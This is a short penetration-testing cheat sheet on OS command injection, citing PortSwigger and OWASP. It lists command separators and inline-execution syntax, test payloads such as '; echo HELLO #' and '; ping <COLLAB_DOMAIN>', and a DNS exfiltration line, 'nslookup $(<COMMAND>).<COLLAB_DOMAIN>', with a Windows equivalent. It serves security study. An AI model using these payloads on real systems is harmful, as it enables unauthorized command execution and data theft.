# OS command injection

## Introduction

OS command injection is an attack in which an attacker can execute arbitrary commands on the server-operative system that is running the application, sometimes compromising the application and its data.

This kind of attack is possible due to a lack of proper input/output data validation when an application passes unsafe user input data (forms, cookies, HTTP headers etc.) to a system shell, which is being executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

## Useful commands

| Purpose of command    | Linux                                   | Windows                                                                            |
| --------------------- | --------------------------------------- | ---------------------------------------------------------------------------------- |
| Name of current user  | `whoami`                                | `whoami`                                                                           |
| Operating system      | `uname -a`                              | `ver`                                                                              |
| Network configuration | `ifconfig`                              | `ipconfig /all`                                                                    |
| Network connections   | `netstat -an`                           | `netstat -an`                                                                      |
| Running processes     | `ps -ef`                                | `tasklist`                                                                         |
| Exfiltrate data       | `nslookup $(<COMMAND>).<COLLAB_DOMAIN>` | for /F "usebackq delims=" %A in ( \`\<COMMAND>\`) do nslookup %A.\<COLLAB\_DOMAIN> |

## Ways of injection OS commands

Several characters work as command separators, allowing commands to be chained together. The following command separators work on both **Windows** and **Unix**-based systems:

```bash
&
&&
|
||
```

The following command separators work only on **Unix**-based systems:

```bash
;
# Newline
0x0a
\n
```

On **Unix**-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

```bash
`<COMMAND>`
$(COMMAND)
```

To use this technique, you can try to send the following payload if the output of the command is returned.

```
; echo HELLO #
```

But, if the result of the command is not shown in the response of the request, try the follwoing.

```bash
; ping <COLLAB_DOMAIN>
```

## References

* [OS command injection \[PortSwigger\]](https://portswigger.net/web-security/os-command-injection)
* [Command Injection \[OWASP\]](https://owasp.org/www-community/attacks/Command_Injection)